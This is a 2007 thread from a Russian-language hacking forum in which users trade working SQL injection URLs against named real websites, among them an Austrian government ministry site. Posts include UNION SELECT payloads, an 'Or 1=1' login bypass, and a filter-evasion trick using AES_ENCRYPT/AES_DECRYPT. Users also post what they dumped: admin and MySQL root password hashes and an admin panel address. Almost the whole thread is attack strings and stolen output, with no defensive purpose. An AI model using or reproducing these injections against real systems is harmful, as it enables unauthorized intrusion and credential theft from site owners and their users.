ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4061  
Старый 15.12.2007, 02:29
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://spaceshop.ru/index.php?page=info&id=-869+union+select+1,email,3,4,5,6,7,8,9,10,11,12+from+forum/*
Код:
http://xbox360.freeki.es/detalle_noticia.php?id=-1317+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

Последний раз редактировалось SWAT; 15.12.2007 в 02:36..
 
Ответить с цитированием

  #4062  
Старый 15.12.2007, 16:30
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

http://www.a2k.org.ua/news.php?id=-1+union+select+1,2,3,4,user,password,email,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38+from+users/*&lng=ua

де админка хз.
 
Ответить с цитированием

  #4063  
Старый 15.12.2007, 19:36
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

old.lipstick.ru
Сначало логинимся лоин и пасс 'Or 1=1/*
ПОтом идём сюда
Код:
http://old.lipstick.ru/smscenter.php?view=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a, password),6,7+FROM+users+LIMIT+0,1/*
admin:399a2ece6b34ff6e314d87301af489f0
Версия 4

В админку не попасть, проблема с хэдэрами
 
Ответить с цитированием

  #4064  
Старый 15.12.2007, 19:40
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

Код:
http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Чего-то дальше не крутится...(
 
Ответить с цитированием

  #4065  
Старый 15.12.2007, 21:13
4Dfx
Новичок
Регистрация: 06.12.2007
Сообщений: 11
Провел на форуме:
120052

Репутация: 30
Отправить сообщение для 4Dfx с помощью ICQ
По умолчанию

Цитата:
Сообщение от 5taY3r  
Код:
http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Чего-то дальше не крутится...(
Там фильтруются входящие данные пробуй AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES _DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*
 
Ответить с цитированием

  #4066  
Старый 15.12.2007, 21:24
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Цитата:
Сообщение от 4Dfx  
Там фильтруются входящие данные пробуй AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES _DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*
Код:
http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/*
root:*DE342DA364B639606FF4447B24338C1318FB181C:pseudo
 
Ответить с цитированием

  #4067  
Старый 15.12.2007, 21:56
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

Цитата:
Сообщение от v1ru$  
Код:
http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/*
root:*DE342DA364B639606FF4447B24338C1318FB181C:pseudo
Код:
http://www.bmeia.gv.at/robots.txt
админка:_https://cms.bmeia.gv.at/truman/index.php3
логин/пароль не катят...
 
Ответить с цитированием

  #4068  
Старый 15.12.2007, 22:13
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Цитата:
Сообщение от 5taY3r  
Код:
http://www.bmeia.gv.at/robots.txt
админка:_https://cms.bmeia.gv.at/truman/index.php3
логин/пароль не катят...
так это пасс к БД)
 
Ответить с цитированием

  #4069  
Старый 15.12.2007, 22:28
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

Цитата:
Сообщение от v1ru$  
так это пасс к БД)
Да я в курсе...) Решил на авось попробовать, не прокатило...
 
Ответить с цитированием

  #4070  
Старый 15.12.2007, 23:26
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.aziendeinvista.it/

Код:
http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Passw,Admin),3,4,5,6,7+from+admin--
http://www.tissuper.com.au/

Код:
http://www.tissuper.com.au/newsline/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admin_user)--

Последний раз редактировалось Ded MustD!e; 15.12.2007 в 23:37..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ